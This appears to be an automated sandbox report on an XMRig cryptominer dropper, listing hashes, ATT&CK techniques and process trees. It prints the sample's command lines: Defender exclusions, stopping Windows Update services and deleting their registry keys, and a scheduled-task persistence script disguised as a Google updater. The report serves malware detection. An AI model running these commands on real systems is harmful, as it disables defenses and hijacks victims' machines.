xmrig | 2d149bca64703b7cf996a772ba91423da1e1f11dbae522f3e4d3b34095d3b89d

General

Target

41382215636e83ce55d622ce7f15733a.exe
Size

4.0MB
MD5

41382215636e83ce55d622ce7f15733a
SHA1

aff94de054bb404000c010c4713998ddc6905626
SHA256

2d149bca64703b7cf996a772ba91423da1e1f11dbae522f3e4d3b34095d3b89d
SHA512

94216303bf4455bc2a8de631c453bef013c1fab36f28c167c3488730d430713f0f117561bff3137697732b3bf16cab74b772fad79a36fc7c06e5be6fbaafe98d
SSDEEP

98304:jgFNGMRUCTguDUdjIF1qZHEfgg1AE1AQamhsDUoYX4:jYN7bThDUdj+qxEYGAE1AQuR

Score

10^/10

xmrig evasion miner upx

Malware Config

Signatures

Modifies security service 2 TTPs 5 IoCs

evasion

Modify Registry

T1112

Modify Existing Service

T1031

Processes:

reg.exe

description	ioc	process
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo\0	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo\1	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Parameters	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Security	reg.exe

xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig

XMRig Miner payload 1 IoCs

miner

Processes:

resource	yara_rule
behavioral2/memory/2236-187-0x00007FF7F1960000-0x00007FF7F2154000-memory.dmp	xmrig

Executes dropped EXE 1 IoCs

Processes:

updater.exe

pid process

4148 updater.exe
Stops running service(s) 3 TTPs
evasion

Modify Existing Service
T1031

Impair Defenses
T1562

Service Stop
T1489

pid	process
4148	updater.exe

UPX packed file 2 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

Processes:

resource	yara_rule
behavioral2/memory/2236-182-0x00007FF7F1960000-0x00007FF7F2154000-memory.dmp	upx
behavioral2/memory/2236-187-0x00007FF7F1960000-0x00007FF7F2154000-memory.dmp	upx

Suspicious use of SetThreadContext 2 IoCs

Processes:

updater.exe

description	pid	process	target process
PID 4148 set thread context of 3648	4148	updater.exe	conhost.exe
PID 4148 set thread context of 2236	4148	updater.exe	dwm.exe

Launches sc.exe 10 IoCs
Sc.exe is a Windows utlilty to control services on the system.

Processes:

sc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exe

pid process

1280 sc.exe
3232 sc.exe
1752 sc.exe
4160 sc.exe
3432 sc.exe
2920 sc.exe
4628 sc.exe
552 sc.exe
1896 sc.exe
3504 sc.exe

pid	process
1280	sc.exe
3232	sc.exe
1752	sc.exe
4160	sc.exe
3432	sc.exe
2920	sc.exe
4628	sc.exe
552	sc.exe
1896	sc.exe
3504	sc.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

powershell.exepowershell.exepowershell.exepowershell.exepowershell.exedwm.exe

pid	process
936	powershell.exe
936	powershell.exe
3552	powershell.exe
3552	powershell.exe
4684	powershell.exe
4684	powershell.exe
3420	powershell.exe
3420	powershell.exe
3216	powershell.exe
3216	powershell.exe
2236	dwm.exe
2236	dwm.exe
2236	dwm.exe
2236	dwm.exe
2236	dwm.exe
2236	dwm.exe
2236	dwm.exe
2236	dwm.exe
2236	dwm.exe
2236	dwm.exe
2236	dwm.exe
2236	dwm.exe
2236	dwm.exe
2236	dwm.exe
2236	dwm.exe
2236	dwm.exe
2236	dwm.exe
2236	dwm.exe
2236	dwm.exe
2236	dwm.exe
2236	dwm.exe
2236	dwm.exe
2236	dwm.exe
2236	dwm.exe
2236	dwm.exe
2236	dwm.exe
2236	dwm.exe
2236	dwm.exe
2236	dwm.exe
2236	dwm.exe
2236	dwm.exe
2236	dwm.exe
2236	dwm.exe
2236	dwm.exe
2236	dwm.exe
2236	dwm.exe
2236	dwm.exe
2236	dwm.exe
2236	dwm.exe
2236	dwm.exe
2236	dwm.exe
2236	dwm.exe
2236	dwm.exe
2236	dwm.exe
2236	dwm.exe
2236	dwm.exe
2236	dwm.exe
2236	dwm.exe
2236	dwm.exe
2236	dwm.exe
2236	dwm.exe
2236	dwm.exe
2236	dwm.exe
2236	dwm.exe

Suspicious behavior: LoadsDriver 1 IoCs

Processes:

pid process

660

pid	process
660

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

powershell.exepowershell.exe

description	pid	process
Token: SeDebugPrivilege	936	powershell.exe
Token: SeDebugPrivilege	3552	powershell.exe
Token: SeIncreaseQuotaPrivilege	3552	powershell.exe
Token: SeSecurityPrivilege	3552	powershell.exe
Token: SeTakeOwnershipPrivilege	3552	powershell.exe
Token: SeLoadDriverPrivilege	3552	powershell.exe
Token: SeSystemProfilePrivilege	3552	powershell.exe
Token: SeSystemtimePrivilege	3552	powershell.exe
Token: SeProfSingleProcessPrivilege	3552	powershell.exe
Token: SeIncBasePriorityPrivilege	3552	powershell.exe
Token: SeCreatePagefilePrivilege	3552	powershell.exe
Token: SeBackupPrivilege	3552	powershell.exe
Token: SeRestorePrivilege	3552	powershell.exe
Token: SeShutdownPrivilege	3552	powershell.exe
Token: SeDebugPrivilege	3552	powershell.exe
Token: SeSystemEnvironmentPrivilege	3552	powershell.exe
Token: SeRemoteShutdownPrivilege	3552	powershell.exe
Token: SeUndockPrivilege	3552	powershell.exe
Token: SeManageVolumePrivilege	3552	powershell.exe
Token: 33	3552	powershell.exe
Token: 34	3552	powershell.exe
Token: 35	3552	powershell.exe
Token: 36	3552	powershell.exe
Token: SeIncreaseQuotaPrivilege	3552	powershell.exe
Token: SeSecurityPrivilege	3552	powershell.exe
Token: SeTakeOwnershipPrivilege	3552	powershell.exe
Token: SeLoadDriverPrivilege	3552	powershell.exe
Token: SeSystemProfilePrivilege	3552	powershell.exe
Token: SeSystemtimePrivilege	3552	powershell.exe
Token: SeProfSingleProcessPrivilege	3552	powershell.exe
Token: SeIncBasePriorityPrivilege	3552	powershell.exe
Token: SeCreatePagefilePrivilege	3552	powershell.exe
Token: SeBackupPrivilege	3552	powershell.exe
Token: SeRestorePrivilege	3552	powershell.exe
Token: SeShutdownPrivilege	3552	powershell.exe
Token: SeDebugPrivilege	3552	powershell.exe
Token: SeSystemEnvironmentPrivilege	3552	powershell.exe
Token: SeRemoteShutdownPrivilege	3552	powershell.exe
Token: SeUndockPrivilege	3552	powershell.exe
Token: SeManageVolumePrivilege	3552	powershell.exe
Token: 33	3552	powershell.exe
Token: 34	3552	powershell.exe
Token: 35	3552	powershell.exe
Token: 36	3552	powershell.exe
Token: SeIncreaseQuotaPrivilege	3552	powershell.exe
Token: SeSecurityPrivilege	3552	powershell.exe
Token: SeTakeOwnershipPrivilege	3552	powershell.exe
Token: SeLoadDriverPrivilege	3552	powershell.exe
Token: SeSystemProfilePrivilege	3552	powershell.exe
Token: SeSystemtimePrivilege	3552	powershell.exe
Token: SeProfSingleProcessPrivilege	3552	powershell.exe
Token: SeIncBasePriorityPrivilege	3552	powershell.exe
Token: SeCreatePagefilePrivilege	3552	powershell.exe
Token: SeBackupPrivilege	3552	powershell.exe
Token: SeRestorePrivilege	3552	powershell.exe
Token: SeShutdownPrivilege	3552	powershell.exe
Token: SeDebugPrivilege	3552	powershell.exe
Token: SeSystemEnvironmentPrivilege	3552	powershell.exe
Token: SeRemoteShutdownPrivilege	3552	powershell.exe
Token: SeUndockPrivilege	3552	powershell.exe
Token: SeManageVolumePrivilege	3552	powershell.exe
Token: 33	3552	powershell.exe
Token: 34	3552	powershell.exe
Token: 35	3552	powershell.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

41382215636e83ce55d622ce7f15733a.execmd.exepowershell.exeupdater.execmd.execonhost.execmd.exe

description	pid	process	target process
PID 1180 wrote to memory of 936	1180	41382215636e83ce55d622ce7f15733a.exe	powershell.exe
PID 1180 wrote to memory of 936	1180	41382215636e83ce55d622ce7f15733a.exe	powershell.exe
PID 1180 wrote to memory of 3848	1180	41382215636e83ce55d622ce7f15733a.exe	cmd.exe
PID 1180 wrote to memory of 3848	1180	41382215636e83ce55d622ce7f15733a.exe	cmd.exe
PID 1180 wrote to memory of 3552	1180	41382215636e83ce55d622ce7f15733a.exe	powershell.exe
PID 1180 wrote to memory of 3552	1180	41382215636e83ce55d622ce7f15733a.exe	powershell.exe
PID 3848 wrote to memory of 4160	3848	cmd.exe	sc.exe
PID 3848 wrote to memory of 4160	3848	cmd.exe	sc.exe
PID 3848 wrote to memory of 3432	3848	cmd.exe	sc.exe
PID 3848 wrote to memory of 3432	3848	cmd.exe	sc.exe
PID 3848 wrote to memory of 552	3848	cmd.exe	sc.exe
PID 3848 wrote to memory of 552	3848	cmd.exe	sc.exe
PID 3848 wrote to memory of 2920	3848	cmd.exe	sc.exe
PID 3848 wrote to memory of 2920	3848	cmd.exe	sc.exe
PID 3848 wrote to memory of 4628	3848	cmd.exe	sc.exe
PID 3848 wrote to memory of 4628	3848	cmd.exe	sc.exe
PID 3848 wrote to memory of 2372	3848	cmd.exe	reg.exe
PID 3848 wrote to memory of 2372	3848	cmd.exe	reg.exe
PID 3848 wrote to memory of 4156	3848	cmd.exe	reg.exe
PID 3848 wrote to memory of 4156	3848	cmd.exe	reg.exe
PID 3848 wrote to memory of 2608	3848	cmd.exe	reg.exe
PID 3848 wrote to memory of 2608	3848	cmd.exe	reg.exe
PID 3848 wrote to memory of 1968	3848	cmd.exe	reg.exe
PID 3848 wrote to memory of 1968	3848	cmd.exe	reg.exe
PID 3848 wrote to memory of 5048	3848	cmd.exe	reg.exe
PID 3848 wrote to memory of 5048	3848	cmd.exe	reg.exe
PID 1180 wrote to memory of 4684	1180	41382215636e83ce55d622ce7f15733a.exe	powershell.exe
PID 1180 wrote to memory of 4684	1180	41382215636e83ce55d622ce7f15733a.exe	powershell.exe
PID 4684 wrote to memory of 4336	4684	powershell.exe	schtasks.exe
PID 4684 wrote to memory of 4336	4684	powershell.exe	schtasks.exe
PID 4148 wrote to memory of 3420	4148	updater.exe	powershell.exe
PID 4148 wrote to memory of 3420	4148	updater.exe	powershell.exe
PID 4148 wrote to memory of 4988	4148	updater.exe	cmd.exe
PID 4148 wrote to memory of 4988	4148	updater.exe	cmd.exe
PID 4148 wrote to memory of 3216	4148	updater.exe	powershell.exe
PID 4148 wrote to memory of 3216	4148	updater.exe	powershell.exe
PID 4988 wrote to memory of 1896	4988	cmd.exe	sc.exe
PID 4988 wrote to memory of 1896	4988	cmd.exe	sc.exe
PID 4988 wrote to memory of 1280	4988	cmd.exe	sc.exe
PID 4988 wrote to memory of 1280	4988	cmd.exe	sc.exe
PID 4988 wrote to memory of 3232	4988	cmd.exe	sc.exe
PID 4988 wrote to memory of 3232	4988	cmd.exe	sc.exe
PID 4988 wrote to memory of 1752	4988	cmd.exe	sc.exe
PID 4988 wrote to memory of 1752	4988	cmd.exe	sc.exe
PID 4988 wrote to memory of 3504	4988	cmd.exe	sc.exe
PID 4988 wrote to memory of 3504	4988	cmd.exe	sc.exe
PID 4988 wrote to memory of 4380	4988	cmd.exe	reg.exe
PID 4988 wrote to memory of 4380	4988	cmd.exe	reg.exe
PID 4988 wrote to memory of 2336	4988	cmd.exe	reg.exe
PID 4988 wrote to memory of 2336	4988	cmd.exe	reg.exe
PID 4988 wrote to memory of 3144	4988	cmd.exe	reg.exe
PID 4988 wrote to memory of 3144	4988	cmd.exe	reg.exe
PID 4988 wrote to memory of 1416	4988	cmd.exe	reg.exe
PID 4988 wrote to memory of 1416	4988	cmd.exe	reg.exe
PID 4988 wrote to memory of 3128	4988	cmd.exe	reg.exe
PID 4988 wrote to memory of 3128	4988	cmd.exe	reg.exe
PID 4148 wrote to memory of 3648	4148	updater.exe	conhost.exe
PID 4148 wrote to memory of 3648	4148	updater.exe	conhost.exe
PID 4148 wrote to memory of 3648	4148	updater.exe	conhost.exe
PID 4148 wrote to memory of 3824	4148	updater.exe	cmd.exe
PID 4148 wrote to memory of 3824	4148	updater.exe	cmd.exe
PID 3648 wrote to memory of 4488	3648	conhost.exe	cmd.exe
PID 3648 wrote to memory of 4488	3648	conhost.exe	cmd.exe
PID 4488 wrote to memory of 4312	4488	cmd.exe	WMIC.exe

C:\Users\Admin\AppData\Local\Temp\41382215636e83ce55d622ce7f15733a.exe
"C:\Users\Admin\AppData\Local\Temp\41382215636e83ce55d622ce7f15733a.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:1180

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:936

C:\Windows\SYSTEM32\cmd.exe
cmd /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
2⤵
- Suspicious use of WriteProcessMemory
PID:3848

C:\Windows\system32\sc.exe
sc stop UsoSvc
3⤵
- Launches sc.exe
PID:4160

C:\Windows\system32\sc.exe
sc stop WaaSMedicSvc
3⤵
- Launches sc.exe
PID:3432

C:\Windows\system32\sc.exe
sc stop wuauserv
3⤵
- Launches sc.exe
PID:552

C:\Windows\system32\sc.exe
sc stop bits
3⤵
- Launches sc.exe
PID:2920

C:\Windows\system32\sc.exe
sc stop dosvc
3⤵
- Launches sc.exe
PID:4628

C:\Windows\system32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f
3⤵
PID:2372

C:\Windows\system32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f
3⤵
PID:4156

C:\Windows\system32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f
3⤵
- Modifies security service
PID:2608

C:\Windows\system32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f
3⤵
PID:1968

C:\Windows\system32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
3⤵
PID:5048

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell <#drbpb#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { "schtasks /create /f /sc onlogon /rl highest /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Users\Admin\AppData\Roaming\Google\Chrome\updater.exe'''" } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Users\Admin\AppData\Roaming\Google\Chrome\updater.exe' }
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3552

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell <#zfalrzu#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { schtasks /run /tn "GoogleUpdateTaskMachineQC" } Else { "C:\Users\Admin\AppData\Roaming\Google\Chrome\updater.exe" }
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:4684

C:\Windows\system32\schtasks.exe
"C:\Windows\system32\schtasks.exe" /run /tn GoogleUpdateTaskMachineQC
3⤵
PID:4336

C:\Users\Admin\AppData\Roaming\Google\Chrome\updater.exe
C:\Users\Admin\AppData\Roaming\Google\Chrome\updater.exe
1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:4148

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
2⤵
- Suspicious behavior: EnumeratesProcesses
PID:3420

C:\Windows\system32\cmd.exe
cmd /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
2⤵
- Suspicious use of WriteProcessMemory
PID:4988

C:\Windows\system32\sc.exe
sc stop UsoSvc
3⤵
- Launches sc.exe
PID:1896

C:\Windows\system32\sc.exe
sc stop WaaSMedicSvc
3⤵
- Launches sc.exe
PID:1280

C:\Windows\system32\sc.exe
sc stop wuauserv
3⤵
- Launches sc.exe
PID:3232

C:\Windows\system32\sc.exe
sc stop bits
3⤵
- Launches sc.exe
PID:1752

C:\Windows\system32\sc.exe
sc stop dosvc
3⤵
- Launches sc.exe
PID:3504

C:\Windows\system32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f
3⤵
PID:4380

C:\Windows\system32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f
3⤵
PID:2336

C:\Windows\system32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f
3⤵
PID:3144

C:\Windows\system32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f
3⤵
PID:1416

C:\Windows\system32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
3⤵
PID:3128

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell <#drbpb#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { "schtasks /create /f /sc onlogon /rl highest /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Users\Admin\AppData\Roaming\Google\Chrome\updater.exe'''" } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Users\Admin\AppData\Roaming\Google\Chrome\updater.exe' }
2⤵
- Suspicious behavior: EnumeratesProcesses
PID:3216

C:\Windows\system32\conhost.exe
C:\Windows\system32\conhost.exe llktminrzivp
2⤵
- Suspicious use of WriteProcessMemory
PID:3648

C:\Windows\system32\cmd.exe
cmd /c mkdir "C:\Users\Admin\AppData\Roaming\Google\Libs\" & wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Users\Admin\AppData\Roaming\Google\Libs\g.log"
3⤵
- Suspicious use of WriteProcessMemory
PID:4488

C:\Windows\System32\Wbem\WMIC.exe
wmic PATH Win32_VideoController GET Name, VideoProcessor
4⤵
PID:4312

C:\Windows\system32\cmd.exe
cmd /c mkdir "C:\Users\Admin\AppData\Roaming\Google\Libs\" & wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Users\Admin\AppData\Roaming\Google\Libs\g.log"
2⤵
PID:3824

C:\Windows\system32\dwm.exe
C:\Windows\system32\dwm.exe qtbgcbbuyarrseoa 6E3sjfZq2rJQaxvLPmXgsA4f0StS9pic9Xw++oZ1mnbMNdSoXP4ts/KtNDhUPQkUGu8K1XCwbSh+ypLRcuGVjKHCqkQEbMjFPp2wEHUk/2YPEa7u8eDtaLNsvMtmfnW7pfZpWBLC28ol0YuaRyoAomoKg0M+MybStmWANwpbdJc3A2uC6nbgxCBAPoLOO1OuubEuAZTBCdX/xrrcvKnB4H9LwgUyVl9z4LaBunuWLn9L+984DlEL8pLkHAhoqzbgnzq2Q8UulW3Pe1gu+jesqTUbmj//6+fiMhPgKixPwrGz+CELGutufbQREgiXW/NQvg1coXmscuZ6yQ7RnXXKH4GsnmWjjAo51w5WaTYtMM4tqi5n6yulrtZsexR2Y9abHIdInko1dNj2btVqFpVDPxbdEbNaQGAVINOHgf8WWal3b6c2wr6mRVWR/3OEXgmNHc0PdsvyYK2oX+Nd+NLu2R15GYAs/dQrH+CfI88Ko8ilwYx+F3flcrT35XvHxF1c
2⤵
- Suspicious behavior: EnumeratesProcesses
PID:2236

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Modify Existing Service

2

T1031

Privilege Escalation

Defense Evasion

Modify Registry

1

T1112

Impair Defenses

1

T1562

Credential Access

Discovery

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Service Stop

1

T1489

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
Filesize
2KB

MD5
d85ba6ff808d9e5444a4b369f5bc2730

SHA1
31aa9d96590fff6981b315e0b391b575e4c0804a

SHA256
84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

SHA512
8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
944B

MD5
d28a889fd956d5cb3accfbaf1143eb6f

SHA1
157ba54b365341f8ff06707d996b3635da8446f7

SHA256
21e5d7ccf80a293e6ba30ed728846ca19c929c52b96e2c8d34e27cd2234f1d45

SHA512
0b6d88deb9be85722e6a78d5886d49f2caf407a59e128d2b4ed74c1356f9928c40048a62731959f2460e9ff9d9feee311043d2a37abe3bb92c2b76a44281478c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
1KB

MD5
2f544862b244d0801f82f5fa20013f20

SHA1
39e3dcf4e849bb1a39b67b9fc2d2f597ff6a3b8a

SHA256
780f0fda3df0c4a4b3ca79177ecf0741de262f10abc9c15e923b7a2b0624dbc2

SHA512
a4ab31a57ac1b773766e50decdc16e1db4de1ad9f9e7854a0e8ec86fb59b9e53d3a83e2e3b7ae137256b4ae9411018044dc2de1471ea6b74adfd778e6826ab52

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
1KB

MD5
612b19feac3b60bdc771ec888769ea75

SHA1
cc0117dc3f83e139f22d7c9f068a0fa2027fc8fb

SHA256
3eb12f5e02a7aad8764186e1f62d9cebcc8667c854ebf4356fe404f042b84ec1

SHA512
2f56333015641eb11b853a350ca5a01763ab9fd2d572fca51ba2d7df3018546c9667a64ba670e443e0fef5c10879964bfe18084ae0b44e95cb17dcc864ffd4af

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
944B

MD5
2d71702dd66e3ad48a41a47388abf261

SHA1
c19062002ce4458a706e77d3a0c92d2208076345

SHA256
6e2a5046c7fddf002cd1172762834f4fa1b5db9958b4d6799724aa871dff2e61

SHA512
4b576e18d0068bfe50d3292cf3a846dad9018349f54d2fba8701fd3ab92a690a4fe2ebf039cf2fdafa09a6f885625752d259d8b12d201c2f771ce26ffb98d37d

Download Submit
C:\Users\Admin\AppData\Roaming\Google\Chrome\updater.exe
Filesize
4.0MB

MD5
c5eccb1c34f5b5280b63739c2c0c09e8

SHA1
e2005f576140f66759cb8a68c4aec4f94e61b94b

SHA256
9853e0d5a9fdc25ab4021d8dfbe7f0ba1bfbfd6f19e4e3ea96b9cce93026760c

SHA512
71d1d82077aec3b924b4f3d4def6d0fc184c4c8586d76f3f41f917e742b5398c134631175ca4f243db538b6c8fe8daf19c23e02736cbef71d5ec61a78fc6a4dd

Download Submit
C:\Users\Admin\AppData\Roaming\Google\Chrome\updater.exe
Filesize
4.0MB

MD5
c5eccb1c34f5b5280b63739c2c0c09e8

SHA1
e2005f576140f66759cb8a68c4aec4f94e61b94b

SHA256
9853e0d5a9fdc25ab4021d8dfbe7f0ba1bfbfd6f19e4e3ea96b9cce93026760c

SHA512
71d1d82077aec3b924b4f3d4def6d0fc184c4c8586d76f3f41f917e742b5398c134631175ca4f243db538b6c8fe8daf19c23e02736cbef71d5ec61a78fc6a4dd

Download Submit
C:\Users\Admin\AppData\Roaming\Google\Libs\g.log
Filesize
226B

MD5
fdba80d4081c28c65e32fff246dc46cb

SHA1
74f809dedd1fc46a3a63ac9904c80f0b817b3686

SHA256
b9a385645ec2edddbc88b01e6b21362c14e9d7895712e67d375874eb7308e398

SHA512
b24a6784443c85bb56f8ae401ad4553c0955f587671ec7960bda737901d677d5e15d1a47d3674505fc98ea09ede2e5078a0aeb4481d3728e6715f3eac557cd29

Download Submit
memory/552-141-0x0000000000000000-mapping.dmp

Download
memory/936-132-0x0000000000000000-mapping.dmp

Download
memory/936-135-0x00007FFF780A0000-0x00007FFF78B61000-memory.dmp

Filesize
10.8MB

Download
memory/936-134-0x00007FFF780A0000-0x00007FFF78B61000-memory.dmp

Filesize
10.8MB

Download
memory/936-133-0x000002717FEF0000-0x000002717FF12000-memory.dmp

Filesize
136KB

Download
memory/1280-167-0x0000000000000000-mapping.dmp

Download
memory/1416-174-0x0000000000000000-mapping.dmp

Download
memory/1752-169-0x0000000000000000-mapping.dmp

Download
memory/1896-164-0x0000000000000000-mapping.dmp

Download
memory/1968-149-0x0000000000000000-mapping.dmp

Download
memory/2236-191-0x00000225E33B0000-0x00000225E33D0000-memory.dmp

Filesize
128KB

Download
memory/2236-183-0x00000225E1A40000-0x00000225E1A60000-memory.dmp

Filesize
128KB

Download
memory/2236-186-0x00000225E1D10000-0x00000225E1D30000-memory.dmp

Filesize
128KB

Download
memory/2236-193-0x00000225E33B0000-0x00000225E33D0000-memory.dmp

Filesize
128KB

Download
memory/2236-190-0x00000225E3390000-0x00000225E33B0000-memory.dmp

Filesize
128KB

Download
memory/2236-182-0x00007FF7F1960000-0x00007FF7F2154000-memory.dmp

Filesize
8.0MB

Download
memory/2236-188-0x00000225E3390000-0x00000225E33B0000-memory.dmp

Filesize
128KB

Download
memory/2236-187-0x00007FF7F1960000-0x00007FF7F2154000-memory.dmp

Filesize
8.0MB

Download
memory/2236-181-0x00007FF7F21525D0-mapping.dmp

Download
memory/2236-189-0x00000225E3390000-0x00000225E33B0000-memory.dmp

Filesize
128KB

Download
memory/2236-192-0x00000225E3390000-0x00000225E33B0000-memory.dmp

Filesize
128KB

Download
memory/2336-172-0x0000000000000000-mapping.dmp

Download
memory/2372-145-0x0000000000000000-mapping.dmp

Download
memory/2608-148-0x0000000000000000-mapping.dmp

Download
memory/2920-143-0x0000000000000000-mapping.dmp

Download
memory/3128-175-0x0000000000000000-mapping.dmp

Download
memory/3144-173-0x0000000000000000-mapping.dmp

Download
memory/3216-165-0x00007FFF78560000-0x00007FFF79021000-memory.dmp

Filesize
10.8MB

Download
memory/3216-163-0x0000000000000000-mapping.dmp

Download
memory/3216-176-0x00007FFF78560000-0x00007FFF79021000-memory.dmp

Filesize
10.8MB

Download
memory/3232-168-0x0000000000000000-mapping.dmp

Download
memory/3420-161-0x00007FFF78560000-0x00007FFF79021000-memory.dmp

Filesize
10.8MB

Download
memory/3420-160-0x00007FFF78560000-0x00007FFF79021000-memory.dmp

Filesize
10.8MB

Download
memory/3420-158-0x0000000000000000-mapping.dmp

Download
memory/3432-140-0x0000000000000000-mapping.dmp

Download
memory/3504-170-0x0000000000000000-mapping.dmp

Download
memory/3552-147-0x00007FFF780A0000-0x00007FFF78B61000-memory.dmp

Filesize
10.8MB

Download
memory/3552-137-0x0000000000000000-mapping.dmp

Download
memory/3552-151-0x00007FFF780A0000-0x00007FFF78B61000-memory.dmp

Filesize
10.8MB

Download
memory/3648-177-0x00007FF7BB1A14E0-mapping.dmp

Download
memory/3824-178-0x0000000000000000-mapping.dmp

Download
memory/3848-136-0x0000000000000000-mapping.dmp

Download
memory/4156-146-0x0000000000000000-mapping.dmp

Download
memory/4160-138-0x0000000000000000-mapping.dmp

Download
memory/4312-180-0x0000000000000000-mapping.dmp

Download
memory/4336-154-0x0000000000000000-mapping.dmp

Download
memory/4380-171-0x0000000000000000-mapping.dmp

Download
memory/4488-179-0x0000000000000000-mapping.dmp

Download
